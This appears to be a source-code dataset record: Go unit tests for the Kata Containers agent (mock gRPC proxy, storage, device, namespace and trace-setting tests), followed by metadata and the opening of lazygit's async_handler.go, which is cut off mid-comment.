func (p *gRPCProxy) MemHotplugByProbe(ctx context.Context, req *pb.MemHotplugByProbeRequest) (*gpb.Empty, error) {
return &gpb.Empty{}, nil
}
func (p *gRPCProxy) GetOOMEvent(ctx context.Context, req *pb.GetOOMEventRequest) (*pb.OOMEvent, error) {
return &pb.OOMEvent{}, nil
}
func gRPCRegister(s *ttrpc.Server, srv interface{}) {
switch g := srv.(type) {
case *gRPCProxy:
pb.RegisterAgentServiceService(s, g)
pb.RegisterHealthService(s, g)
}
}
var reqList = []interface{}{
&pb.CreateSandboxRequest{},
&pb.DestroySandboxRequest{},
&pb.ExecProcessRequest{},
&pb.CreateContainerRequest{},
&pb.StartContainerRequest{},
&pb.RemoveContainerRequest{},
&pb.SignalProcessRequest{},
&pb.CheckRequest{},
&pb.WaitProcessRequest{},
&pb.StatsContainerRequest{},
&pb.SetGuestDateTimeRequest{},
}
func TestKataAgentSendReq(t *testing.T) {
assert := assert.New(t)
impl := &gRPCProxy{}
proxy := mock.ProxyGRPCMock{
GRPCImplementer: impl,
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.Nil(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
err = proxy.Start(testKataProxyURL)
assert.Nil(err)
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
for _, req := range reqList {
_, err = k.sendReq(req)
assert.Nil(err)
}
sandbox := &Sandbox{}
container := &Container{}
execid := "processFooBar"
err = k.startContainer(sandbox, container)
assert.Nil(err)
err = k.signalProcess(container, execid, syscall.SIGKILL, true)
assert.Nil(err)
err = k.winsizeProcess(container, execid, 100, 200)
assert.Nil(err)
_, err = k.processListContainer(sandbox, Container{}, ProcessListOptions{})
assert.Nil(err)
err = k.updateContainer(sandbox, Container{}, specs.LinuxResources{})
assert.Nil(err)
err = k.pauseContainer(sandbox, Container{})
assert.Nil(err)
err = k.resumeContainer(sandbox, Container{})
assert.Nil(err)
err = k.onlineCPUMem(1, true)
assert.Nil(err)
_, err = k.statsContainer(sandbox, Container{})
assert.Nil(err)
err = k.check()
assert.Nil(err)
_, err = k.waitProcess(container, execid)
assert.Nil(err)
_, err = k.writeProcessStdin(container, execid, []byte{'c'})
assert.Nil(err)
err = k.closeProcessStdin(container, execid)
assert.Nil(err)
_, err = k.readProcessStdout(container, execid, []byte{})
assert.Nil(err)
_, err = k.readProcessStderr(container, execid, []byte{})
assert.Nil(err)
_, err = k.getOOMEvent()
assert.Nil(err)
}
func TestHandleEphemeralStorage(t *testing.T) {
k := kataAgent{}
var ociMounts []specs.Mount
mountSource := "/tmp/mountPoint"
mount := specs.Mount{
Type: KataEphemeralDevType,
Source: mountSource,
}
ociMounts = append(ociMounts, mount)
epheStorages := k.handleEphemeralStorage(ociMounts)
epheMountPoint := epheStorages[0].MountPoint
expected := filepath.Join(ephemeralPath(), filepath.Base(mountSource))
assert.Equal(t, epheMountPoint, expected,
"Ephemeral mount point didn't match: got %s, expecting %s", epheMountPoint, expected)
}
func TestHandleLocalStorage(t *testing.T) {
k := kataAgent{}
var ociMounts []specs.Mount
mountSource := "mountPoint"
mount := specs.Mount{
Type: KataLocalDevType,
Source: mountSource,
}
sandboxID := "sandboxid"
rootfsSuffix := "rootfs"
ociMounts = append(ociMounts, mount)
localStorages := k.handleLocalStorage(ociMounts, sandboxID, rootfsSuffix)
assert.NotNil(t, localStorages)
assert.Equal(t, len(localStorages), 1)
localMountPoint := localStorages[0].MountPoint
expected := filepath.Join(kataGuestSharedDir(), sandboxID, rootfsSuffix, KataLocalDevType, filepath.Base(mountSource))
assert.Equal(t, localMountPoint, expected)
}
func TestHandleDeviceBlockVolume(t *testing.T) {
k := kataAgent{}
tests := []struct {
BlockDeviceDriver string
inputDev *drivers.BlockDevice
resultVol *pb.Storage
}{
{
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
Pmem: true,
NvdimmID: testNvdimmID,
Format: testBlkDriveFormat,
},
},
resultVol: &pb.Storage{
Driver: kataNvdimmDevType,
Source: fmt.Sprintf("/dev/pmem%s", testNvdimmID),
Fstype: testBlkDriveFormat,
Options: []string{"dax"},
},
},
{
BlockDeviceDriver: config.VirtioBlockCCW,
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
DevNo: testDevNo,
},
},
resultVol: &pb.Storage{
Driver: kataBlkCCWDevType,
Source: testDevNo,
},
},
{
BlockDeviceDriver: config.VirtioBlock,
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
PCIAddr: testPCIAddr,
VirtPath: testVirtPath,
},
},
resultVol: &pb.Storage{
Driver: kataBlkDevType,
Source: testPCIAddr,
},
},
{
BlockDeviceDriver: config.VirtioBlock,
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
VirtPath: testVirtPath,
},
},
resultVol: &pb.Storage{
Driver: kataBlkDevType,
Source: testVirtPath,
},
},
{
BlockDeviceDriver: config.VirtioMmio,
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
VirtPath: testVirtPath,
},
},
resultVol: &pb.Storage{
Driver: kataMmioBlkDevType,
Source: testVirtPath,
},
},
{
BlockDeviceDriver: config.VirtioSCSI,
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
SCSIAddr: testSCSIAddr,
},
},
resultVol: &pb.Storage{
Driver: kataSCSIDevType,
Source: testSCSIAddr,
},
},
}
for _, test := range tests {
c := &Container{
sandbox: &Sandbox{
config: &SandboxConfig{
HypervisorConfig: HypervisorConfig{
BlockDeviceDriver: test.BlockDeviceDriver,
},
},
},
}
vol, _ := k.handleDeviceBlockVolume(c, test.inputDev)
assert.True(t, reflect.DeepEqual(vol, test.resultVol),
"Volume didn't match: got %+v, expecting %+v",
vol, test.resultVol)
}
}
func TestHandleBlockVolume(t *testing.T) {
k := kataAgent{}
c := &Container{
id: "100",
}
containers := map[string]*Container{}
containers[c.id] = c
// Create a VhostUserBlk device and a DeviceBlock device
vDevID := "MockVhostUserBlk"
bDevID := "MockDeviceBlock"
vDestination := "/VhostUserBlk/destination"
bDestination := "/DeviceBlock/destination"
vPCIAddr := "0001:01"
bPCIAddr := "0002:01"
vDev := drivers.NewVhostUserBlkDevice(&config.DeviceInfo{ID: vDevID})
bDev := drivers.NewBlockDevice(&config.DeviceInfo{ID: bDevID})
vDev.VhostUserDeviceAttrs = &config.VhostUserDeviceAttrs{PCIAddr: vPCIAddr}
bDev.BlockDrive = &config.BlockDrive{PCIAddr: bPCIAddr}
var devices []api.Device
devices = append(devices, vDev, bDev)
// Create a VhostUserBlk mount and a DeviceBlock mount
var mounts []Mount
vMount := Mount{
BlockDeviceID: vDevID,
Destination: vDestination,
}
bMount := Mount{
BlockDeviceID: bDevID,
Destination: bDestination,
}
mounts = append(mounts, vMount, bMount)
tmpDir := "/vhost/user/dir"
dm := manager.NewDeviceManager(manager.VirtioBlock, true, tmpDir, devices)
sConfig := SandboxConfig{}
sConfig.HypervisorConfig.BlockDeviceDriver = manager.VirtioBlock
sandbox := Sandbox{
id: "100",
containers: containers,
hypervisor: &mockHypervisor{},
devManager: dm,
ctx: context.Background(),
config: &sConfig,
}
containers[c.id].sandbox = &sandbox
containers[c.id].mounts = mounts
volumeStorages, err := k.handleBlockVolumes(c)
assert.Nil(t, err, "Error while handling block volumes")
vStorage := &pb.Storage{
MountPoint: vDestination,
Fstype: "bind",
Options: []string{"bind"},
Driver: kataBlkDevType,
Source: vPCIAddr,
}
bStorage := &pb.Storage{
MountPoint: bDestination,
Fstype: "bind",
Options: []string{"bind"},
Driver: kataBlkDevType,
Source: bPCIAddr,
}
assert.Equal(t, vStorage, volumeStorages[0], "Error while handle VhostUserBlk type block volume")
assert.Equal(t, bStorage, volumeStorages[1], "Error while handle BlockDevice type block volume")
}
func TestAppendDevicesEmptyContainerDeviceList(t *testing.T) {
k := kataAgent{}
devList := []*pb.Device{}
expected := []*pb.Device{}
ctrDevices := []ContainerDevice{}
c := &Container{
sandbox: &Sandbox{
devManager: manager.NewDeviceManager("virtio-scsi", false, "", nil),
},
devices: ctrDevices,
}
updatedDevList := k.appendDevices(devList, c)
assert.True(t, reflect.DeepEqual(updatedDevList, expected),
"Device lists didn't match: got %+v, expecting %+v",
updatedDevList, expected)
}
func TestAppendDevices(t *testing.T) {
k := kataAgent{}
id := "test-append-block"
ctrDevices := []api.Device{
&drivers.BlockDevice{
GenericDevice: &drivers.GenericDevice{
ID: id,
},
BlockDrive: &config.BlockDrive{
PCIAddr: testPCIAddr,
},
},
}
sandboxConfig := &SandboxConfig{
HypervisorConfig: HypervisorConfig{
BlockDeviceDriver: config.VirtioBlock,
},
}
c := &Container{
sandbox: &Sandbox{
devManager: manager.NewDeviceManager("virtio-blk", false, "", ctrDevices),
config: sandboxConfig,
},
}
c.devices = append(c.devices, ContainerDevice{
ID: id,
ContainerPath: testBlockDeviceCtrPath,
})
devList := []*pb.Device{}
expected := []*pb.Device{
{
Type: kataBlkDevType,
ContainerPath: testBlockDeviceCtrPath,
Id: testPCIAddr,
},
}
updatedDevList := k.appendDevices(devList, c)
assert.True(t, reflect.DeepEqual(updatedDevList, expected),
"Device lists didn't match: got %+v, expecting %+v",
updatedDevList, expected)
}
func TestAppendVhostUserBlkDevices(t *testing.T) {
k := kataAgent{}
id := "test-append-vhost-user-blk"
ctrDevices := []api.Device{
&drivers.VhostUserBlkDevice{
GenericDevice: &drivers.GenericDevice{
ID: id,
},
VhostUserDeviceAttrs: &config.VhostUserDeviceAttrs{
Type: config.VhostUserBlk,
PCIAddr: testPCIAddr,
},
},
}
sandboxConfig := &SandboxConfig{
HypervisorConfig: HypervisorConfig{
BlockDeviceDriver: config.VirtioBlock,
},
}
testVhostUserStorePath := "/test/vhost/user/store/path"
c := &Container{
sandbox: &Sandbox{
devManager: manager.NewDeviceManager("virtio-blk", true, testVhostUserStorePath, ctrDevices),
config: sandboxConfig,
},
}
c.devices = append(c.devices, ContainerDevice{
ID: id,
ContainerPath: testBlockDeviceCtrPath,
})
devList := []*pb.Device{}
expected := []*pb.Device{
{
Type: kataBlkDevType,
ContainerPath: testBlockDeviceCtrPath,
Id: testPCIAddr,
},
}
updatedDevList := k.appendDevices(devList, c)
assert.True(t, reflect.DeepEqual(updatedDevList, expected),
"Device lists didn't match: got %+v, expecting %+v",
updatedDevList, expected)
}
func TestConstraintGRPCSpec(t *testing.T) {
assert := assert.New(t)
expectedCgroupPath := "/foo/bar"
g := &pb.Spec{
Hooks: &pb.Hooks{},
Mounts: []pb.Mount{
{Destination: "/dev/shm"},
},
Linux: &pb.Linux{
Seccomp: &pb.LinuxSeccomp{},
Namespaces: []pb.LinuxNamespace{
{
Type: specs.NetworkNamespace,
Path: "/abc/123",
},
{
Type: specs.MountNamespace,
Path: "/abc/123",
},
},
Resources: &pb.LinuxResources{
Devices: []pb.LinuxDeviceCgroup{},
Memory: &pb.LinuxMemory{},
CPU: &pb.LinuxCPU{},
Pids: &pb.LinuxPids{},
BlockIO: &pb.LinuxBlockIO{},
HugepageLimits: []pb.LinuxHugepageLimit{},
Network: &pb.LinuxNetwork{},
},
CgroupsPath: "system.slice:foo:bar",
Devices: []pb.LinuxDevice{
{
Path: "/dev/vfio/1",
Type: "c",
},
{
Path: "/dev/vfio/2",
Type: "c",
},
},
},
Process: &pb.Process{
SelinuxLabel: "foo",
},
}
k := kataAgent{}
k.constraintGRPCSpec(g, true)
// check nil fields
assert.Nil(g.Hooks)
assert.NotNil(g.Linux.Seccomp)
assert.Nil(g.Linux.Resources.Devices)
assert.NotNil(g.Linux.Resources.Memory)
assert.Nil(g.Linux.Resources.Pids)
assert.Nil(g.Linux.Resources.BlockIO)
assert.Nil(g.Linux.Resources.HugepageLimits)
assert.Nil(g.Linux.Resources.Network)
assert.NotNil(g.Linux.Resources.CPU)
assert.Equal(g.Process.SelinuxLabel, "")
// check namespaces
assert.Len(g.Linux.Namespaces, 1)
assert.Empty(g.Linux.Namespaces[0].Path)
// check mounts
assert.Len(g.Mounts, 1)
// check cgroup path
assert.Equal(expectedCgroupPath, g.Linux.CgroupsPath)
// check Linux devices
assert.Empty(g.Linux.Devices)
}
func TestHandleShm(t *testing.T) {
assert := assert.New(t)
k := kataAgent{}
sandbox := &Sandbox{
shmSize: 8192,
}
var ociMounts []specs.Mount
mount := specs.Mount{
Type: "bind",
Destination: "/dev/shm",
}
ociMounts = append(ociMounts, mount)
k.handleShm(ociMounts, sandbox)
assert.Len(ociMounts, 1)
assert.NotEmpty(ociMounts[0].Destination)
assert.Equal(ociMounts[0].Destination, "/dev/shm")
assert.Equal(ociMounts[0].Type, "bind")
assert.NotEmpty(ociMounts[0].Source, filepath.Join(kataGuestSharedDir(), shmDir))
assert.Equal(ociMounts[0].Options, []string{"rbind"})
sandbox.shmSize = 0
k.handleShm(ociMounts, sandbox)
assert.Len(ociMounts, 1)
assert.Equal(ociMounts[0].Destination, "/dev/shm")
assert.Equal(ociMounts[0].Type, "tmpfs")
assert.Equal(ociMounts[0].Source, "shm")
sizeOption := fmt.Sprintf("size=%d", DefaultShmSize)
assert.Equal(ociMounts[0].Options, []string{"noexec", "nosuid", "nodev", "mode=1777", sizeOption})
// In case the type of mount is ephemeral, the container mount is not
// shared with the sandbox shm.
ociMounts[0].Type = KataEphemeralDevType
mountSource := "/tmp/mountPoint"
ociMounts[0].Source = mountSource
k.handleShm(ociMounts, sandbox)
assert.Len(ociMounts, 1)
assert.Equal(ociMounts[0].Type, KataEphemeralDevType)
assert.NotEmpty(ociMounts[0].Source, mountSource)
epheStorages := k.handleEphemeralStorage(ociMounts)
epheMountPoint := epheStorages[0].MountPoint
expected := filepath.Join(ephemeralPath(), filepath.Base(mountSource))
assert.Equal(epheMountPoint, expected,
"Ephemeral mount point didn't match: got %s, expecting %s", epheMountPoint, expected)
}
func testIsPidNamespacePresent(grpcSpec *pb.Spec) bool {
for _, ns := range grpcSpec.Linux.Namespaces {
if ns.Type == string(specs.PIDNamespace) {
return true
}
}
return false
}
func TestHandlePidNamespace(t *testing.T) {
assert := assert.New(t)
g := &pb.Spec{
Linux: &pb.Linux{
Namespaces: []pb.LinuxNamespace{
{
Type: specs.NetworkNamespace,
Path: "/abc/123",
},
{
Type: specs.MountNamespace,
Path: "/abc/123",
},
},
},
}
sandbox := &Sandbox{}
k := kataAgent{}
sharedPid := k.handlePidNamespace(g, sandbox)
assert.False(sharedPid)
assert.False(testIsPidNamespacePresent(g))
pidNs := pb.LinuxNamespace{
Type: string(specs.PIDNamespace),
Path: "",
}
utsNs := pb.LinuxNamespace{
Type: specs.UTSNamespace,
Path: "",
}
g.Linux.Namespaces = append(g.Linux.Namespaces, pidNs)
g.Linux.Namespaces = append(g.Linux.Namespaces, utsNs)
sharedPid = k.handlePidNamespace(g, sandbox)
assert.False(sharedPid)
assert.False(testIsPidNamespacePresent(g))
pidNs = pb.LinuxNamespace{
Type: string(specs.PIDNamespace),
Path: "/proc/112/ns/pid",
}
g.Linux.Namespaces = append(g.Linux.Namespaces, pidNs)
sharedPid = k.handlePidNamespace(g, sandbox)
assert.True(sharedPid)
assert.False(testIsPidNamespacePresent(g))
}
func TestAgentConfigure(t *testing.T) {
assert := assert.New(t)
dir, err := ioutil.TempDir("", "kata-agent-test")
assert.Nil(err)
defer os.RemoveAll(dir)
k := &kataAgent{}
h := &mockHypervisor{}
c := KataAgentConfig{}
id := "foobar"
err = k.configure(h, id, dir, true, c)
assert.Nil(err)
err = k.configure(h, id, dir, true, c)
assert.Nil(err)
assert.Empty(k.state.URL)
err = k.configure(h, id, dir, false, c)
assert.Nil(err)
}
func TestCmdToKataProcess(t *testing.T) {
assert := assert.New(t)
cmd := types.Cmd{
Args: strings.Split("foo", " "),
Envs: []types.EnvVar{},
WorkDir: "/",
User: "1000",
PrimaryGroup: "1000",
}
_, err := cmdToKataProcess(cmd)
assert.Nil(err)
cmd1 := cmd
cmd1.User = "foobar"
_, err = cmdToKataProcess(cmd1)
assert.Error(err)
cmd1 = cmd
cmd1.PrimaryGroup = "foobar"
_, err = cmdToKataProcess(cmd1)
assert.Error(err)
cmd1 = cmd
cmd1.User = "foobar:1000"
_, err = cmdToKataProcess(cmd1)
assert.Error(err)
cmd1 = cmd
cmd1.User = "1000:2000"
_, err = cmdToKataProcess(cmd1)
assert.Nil(err)
cmd1 = cmd
cmd1.SupplementaryGroups = []string{"foo"}
_, err = cmdToKataProcess(cmd1)
assert.Error(err)
cmd1 = cmd
cmd1.SupplementaryGroups = []string{"4000"}
_, err = cmdToKataProcess(cmd1)
assert.Nil(err)
}
func TestAgentCreateContainer(t *testing.T) {
assert := assert.New(t)
sandbox := &Sandbox{
ctx: context.Background(),
id: "foobar",
config: &SandboxConfig{
ID: "foobar",
HypervisorType: MockHypervisor,
HypervisorConfig: HypervisorConfig{
KernelPath: "foo",
ImagePath: "bar",
},
},
hypervisor: &mockHypervisor{},
}
newStore, err := persist.GetDriver()
assert.NoError(err)
assert.NotNil(newStore)
sandbox.newStore = newStore
container := &Container{
ctx: sandbox.ctx,
id: "barfoo",
sandboxID: "foobar",
sandbox: sandbox,
state: types.ContainerState{
Fstype: "xfs",
},
config: &ContainerConfig{
CustomSpec: &specs.Spec{},
Annotations: map[string]string{},
},
}
impl := &gRPCProxy{}
proxy := mock.ProxyGRPCMock{
GRPCImplementer: impl,
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.Nil(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
err = proxy.Start(testKataProxyURL)
assert.Nil(err)
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
dir, err := ioutil.TempDir("", "kata-agent-test")
assert.Nil(err)
defer os.RemoveAll(dir)
err = k.configure(&mockHypervisor{}, sandbox.id, dir, true, KataAgentConfig{})
assert.Nil(err)
	// We'll fail on container metadata file creation, but it helps increase coverage...
_, err = k.createContainer(sandbox, container)
assert.Error(err)
}
func TestAgentNetworkOperation(t *testing.T) {
assert := assert.New(t)
impl := &gRPCProxy{}
proxy := mock.ProxyGRPCMock{
GRPCImplementer: impl,
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.NoError(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
assert.NoError(proxy.Start(testKataProxyURL))
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
_, err = k.updateInterface(nil)
assert.Nil(err)
_, err = k.listInterfaces()
assert.Nil(err)
_, err = k.updateRoutes([]*vcTypes.Route{})
assert.Nil(err)
_, err = k.listRoutes()
assert.Nil(err)
}
func TestKataAgentSetProxy(t *testing.T) {
assert := assert.New(t)
k := &kataAgent{ctx: context.Background()}
p := &kataBuiltInProxy{}
s := &Sandbox{
ctx: context.Background(),
id: "foobar",
}
err := k.setProxy(s, p, 0, "")
assert.Error(err)
}
func TestKataGetAgentUrl(t *testing.T) {
assert := assert.New(t)
var err error
k := &kataAgent{vmSocket: types.Socket{HostPath: "/abc"}}
assert.NoError(err)
url, err := k.getAgentURL()
assert.Nil(err)
assert.NotEmpty(url)
k.vmSocket = types.VSock{}
assert.NoError(err)
url, err = k.getAgentURL()
assert.Nil(err)
assert.NotEmpty(url)
}
func TestKataCopyFile(t *testing.T) {
assert := assert.New(t)
impl := &gRPCProxy{}
proxy := mock.ProxyGRPCMock{
GRPCImplementer: impl,
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.NoError(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
err = proxy.Start(testKataProxyURL)
assert.NoError(err)
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
err = k.copyFile("/abc/xyz/123", "/tmp")
assert.Error(err)
src, err := ioutil.TempFile("", "src")
assert.NoError(err)
defer os.Remove(src.Name())
data := []byte("abcdefghi123456789")
_, err = src.Write(data)
assert.NoError(err)
assert.NoError(src.Close())
dst, err := ioutil.TempFile("", "dst")
assert.NoError(err)
assert.NoError(dst.Close())
defer os.Remove(dst.Name())
orgGrpcMaxDataSize := grpcMaxDataSize
grpcMaxDataSize = 1
defer func() {
grpcMaxDataSize = orgGrpcMaxDataSize
}()
err = k.copyFile(src.Name(), dst.Name())
assert.NoError(err)
}
func TestKataCleanupSandbox(t *testing.T) {
assert := assert.New(t)
kataHostSharedDirSaved := kataHostSharedDir
kataHostSharedDir = func() string {
td, _ := ioutil.TempDir("", "kata-cleanup")
return td
}
defer func() {
kataHostSharedDir = kataHostSharedDirSaved
}()
s := Sandbox{
id: "testFoo",
}
dir := kataHostSharedDir()
defer os.RemoveAll(dir)
err := os.MkdirAll(path.Join(dir, s.id), 0777)
assert.Nil(err)
k := &kataAgent{ctx: context.Background()}
k.cleanup(&s)
_, err = os.Stat(dir)
assert.False(os.IsExist(err))
}
func TestKataAgentKernelParams(t *testing.T) {
assert := assert.New(t)
type testData struct {
debug bool
trace bool
containerPipeSize uint32
traceMode string
traceType string
expectedParams []Param
}
debugParam := Param{Key: "agent.log", Value: "debug"}
traceIsolatedParam := Param{Key: "agent.trace", Value: "isolated"}
traceCollatedParam := Param{Key: "agent.trace", Value: "collated"}
traceFooParam := Param{Key: "agent.trace", Value: "foo"}
containerPipeSizeParam := Param{Key: vcAnnotations.ContainerPipeSizeKernelParam, Value: "2097152"}
data := []testData{
{false, false, 0, "", "", []Param{}},
{true, false, 0, "", "", []Param{debugParam}},
{false, false, 0, "foo", "", []Param{}},
{false, false, 0, "foo", "", []Param{}},
{false, false, 0, "", "foo", []Param{}},
{false, false, 0, "", "foo", []Param{}},
{false, false, 0, "foo", "foo", []Param{}},
{false, true, 0, "foo", "foo", []Param{}},
{false, false, 0, agentTraceModeDynamic, "", []Param{}},
{false, false, 0, agentTraceModeStatic, "", []Param{}},
{false, false, 0, "", agentTraceTypeIsolated, []Param{}},
{false, false, 0, "", agentTraceTypeCollated, []Param{}},
{false, false, 0, "foo", agentTraceTypeIsolated, []Param{}},
{false, false, 0, "foo", agentTraceTypeCollated, []Param{}},
{false, false, 0, agentTraceModeDynamic, agentTraceTypeIsolated, []Param{}},
{false, false, 0, agentTraceModeDynamic, agentTraceTypeCollated, []Param{}},
{false, false, 0, agentTraceModeStatic, agentTraceTypeCollated, []Param{}},
{false, false, 0, agentTraceModeStatic, agentTraceTypeCollated, []Param{}},
{false, true, 0, agentTraceModeDynamic, agentTraceTypeIsolated, []Param{}},
{false, true, 0, agentTraceModeDynamic, agentTraceTypeCollated, []Param{}},
{true, true, 0, agentTraceModeDynamic, agentTraceTypeCollated, []Param{debugParam}},
{false, true, 0, "", agentTraceTypeIsolated, []Param{}},
{false, true, 0, "", agentTraceTypeCollated, []Param{}},
{true, true, 0, "", agentTraceTypeIsolated, []Param{debugParam}},
{true, true, 0, "", agentTraceTypeCollated, []Param{debugParam}},
{false, true, 0, "foo", agentTraceTypeIsolated, []Param{}},
{false, true, 0, "foo", agentTraceTypeCollated, []Param{}},
{true, true, 0, "foo", agentTraceTypeIsolated, []Param{debugParam}},
{true, true, 0, "foo", agentTraceTypeCollated, []Param{debugParam}},
{false, true, 0, agentTraceModeStatic, agentTraceTypeIsolated, []Param{traceIsolatedParam}},
{false, true, 0, agentTraceModeStatic, agentTraceTypeCollated, []Param{traceCollatedParam}},
{true, true, 0, agentTraceModeStatic, agentTraceTypeIsolated, []Param{traceIsolatedParam, debugParam}},
{true, true, 0, agentTraceModeStatic, agentTraceTypeCollated, []Param{traceCollatedParam, debugParam}},
{false, true, 0, agentTraceModeStatic, "foo", []Param{traceFooParam}},
{true, true, 0, agentTraceModeStatic, "foo", []Param{debugParam, traceFooParam}},
{false, false, 0, "", "", []Param{}},
{false, false, 2097152, "", "", []Param{containerPipeSizeParam}},
}
for i, d := range data {
config := KataAgentConfig{
Debug: d.debug,
Trace: d.trace,
TraceMode: d.traceMode,
TraceType: d.traceType,
ContainerPipeSize: d.containerPipeSize,
}
count := len(d.expectedParams)
params := KataAgentKernelParams(config)
if count == 0 {
assert.Emptyf(params, "test %d (%+v)", i, d)
continue
}
assert.Len(params, count)
for _, p := range d.expectedParams {
assert.Containsf(params, p, "test %d (%+v)", i, d)
}
}
}
func TestKataAgentHandleTraceSettings(t *testing.T) {
assert := assert.New(t)
type testData struct {
traceMode string
trace bool
expectDisableVMShutdown bool
expectDynamicTracing bool
}
data := []testData{
{"", false, false, false},
{"", true, false, false},
{agentTraceModeStatic, true, true, false},
{agentTraceModeDynamic, true, false, true},
}
for i, d := range data {
k := &kataAgent{}
config := KataAgentConfig{
Trace: d.trace,
TraceMode: d.traceMode,
}
disableVMShutdown := k.handleTraceSettings(config)
if d.expectDisableVMShutdown {
assert.Truef(disableVMShutdown, "test %d (%+v)", i, d)
} else {
assert.Falsef(disableVMShutdown, "test %d (%+v)", i, d)
}
if d.expectDynamicTracing {
assert.Truef(k.dynamicTracing, "test %d (%+v)", i, d)
} else {
assert.Falsef(k.dynamicTracing, "test %d (%+v)", i, d)
}
}
}
func TestKataAgentSetDefaultTraceConfigOptions(t *testing.T) {
assert := assert.New(t)
type testData struct {
traceMode string
traceType string
trace bool
expectDefaultTraceMode bool
expectDefaultTraceType bool
expectError bool
}
data := []testData{
{"", "", false, false, false, false},
{agentTraceModeDynamic, agentTraceTypeCollated, false, false, false, false},
{agentTraceModeDynamic, agentTraceTypeIsolated, false, false, false, false},
{agentTraceModeStatic, agentTraceTypeCollated, false, false, false, false},
{agentTraceModeStatic, agentTraceTypeIsolated, false, false, false, false},
{agentTraceModeDynamic, agentTraceTypeCollated, true, false, false, false},
{agentTraceModeDynamic, agentTraceTypeIsolated, true, false, false, false},
{agentTraceModeStatic, agentTraceTypeCollated, true, false, false, false},
{agentTraceModeStatic, agentTraceTypeIsolated, true, false, false, false},
{agentTraceModeDynamic, "", true, false, true, false},
{agentTraceModeDynamic, "invalid", true, false, false, true},
{agentTraceModeStatic, "", true, false, true, false},
{agentTraceModeStatic, "invalid", true, false, false, true},
{"", agentTraceTypeIsolated, true, true, false, false},
{"invalid", agentTraceTypeIsolated, true, false, false, true},
{"", agentTraceTypeCollated, true, true, false, false},
{"invalid", agentTraceTypeCollated, true, false, false, true},
{"", "", true, true, true, false},
{"invalid", "invalid", true, false, false, true},
}
for i, d := range data {
config := &KataAgentConfig{
Trace: d.trace,
TraceMode: d.traceMode,
TraceType: d.traceType,
}
err := KataAgentSetDefaultTraceConfigOptions(config)
if d.expectError {
assert.Error(err, "test %d (%+v)", i, d)
continue
} else {
assert.NoError(err, "test %d (%+v)", i, d)
}
if d.expectDefaultTraceMode {
assert.Equalf(config.TraceMode, defaultAgentTraceMode, "test %d (%+v)", i, d)
}
if d.expectDefaultTraceType {
assert.Equalf(config.TraceType, defaultAgentTraceType, "test %d (%+v)", i, d)
}
}
}
func TestKataAgentDirs(t *testing.T) {
assert := assert.New(t)
uidmapFile, err := os.OpenFile("/proc/self/uid_map", os.O_RDONLY, 0)
assert.NoError(err)
line, err := bufio.NewReader(uidmapFile).ReadBytes('\n')
assert.NoError(err)
uidmap := strings.Fields(string(line))
expectedRootless := (uidmap[0] == "0" && uidmap[1] != "0")
assert.Equal(expectedRootless, rootless.IsRootless())
if expectedRootless {
assert.Equal(kataHostSharedDir(), os.Getenv("XDG_RUNTIME_DIR")+defaultKataHostSharedDir)
assert.Equal(kataGuestSharedDir(), os.Getenv("XDG_RUNTIME_DIR")+defaultKataGuestSharedDir)
assert.Equal(kataGuestSandboxDir(), os.Getenv("XDG_RUNTIME_DIR")+defaultKataGuestSandboxDir)
assert.Equal(ephemeralPath(), os.Getenv("XDG_RUNTIME_DIR")+defaultEphemeralPath)
} else {
assert.Equal(kataHostSharedDir(), defaultKataHostSharedDir)
assert.Equal(kataGuestSharedDir(), defaultKataGuestSharedDir)
assert.Equal(kataGuestSandboxDir(), defaultKataGuestSandboxDir)
assert.Equal(ephemeralPath(), defaultEphemeralPath)
}
}
| ["\"XDG_RUNTIME_DIR\"", "\"XDG_RUNTIME_DIR\"", "\"XDG_RUNTIME_DIR\"", "\"XDG_RUNTIME_DIR\""]
| []
| ["XDG_RUNTIME_DIR"]
| [] | ["XDG_RUNTIME_DIR"] | go | 1 | 0 | |
pkg/tasks/async_handler.go | package tasks
import (
"sync"
"github.com/Jeffthedoor/lazygit/pkg/utils"
)
// the purpose of an AsyncHandler is to ensure that if we have multiple long-running
// requests, we only handle the result of the latest one. For example, if I am
// searching for 'abc' and I have to type 'a' then 'b' then 'c' and each keypress
// dispatches a request to search for things with the string so-far, we'll be searching
// for 'a', 'ab', and 'abc', and it may be that 'abc' comes back first, then 'ab',
// then 'a' and we don't want to display the result for 'a' just because it came
// back last. AsyncHandler keeps track of the order in which things were dispatched
// so that we can ignore anything that comes back late.
type AsyncHandler struct {
currentId int
lastId int
mutex sync.Mutex
onReject func()
}
func NewAsyncHandler() *AsyncHandler {
return &AsyncHandler{
mutex: sync.Mutex{},
}
}
func (self *AsyncHandler) Do(f func() func()) {
self.mutex.Lock()
self.currentId++
id := self.currentId
self.mutex.Unlock()
go utils.Safe(func() {
after := f()
self.handle(after, id)
})
}
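// A minimal usage sketch (editor's illustration, not part of the original
// file): a hypothetical caller dispatches a slow search and only renders the
// newest result. search, render and query are assumed names standing in for
// the caller's own long-running work and UI update.
//
//	handler := NewAsyncHandler()
//	handler.Do(func() func() {
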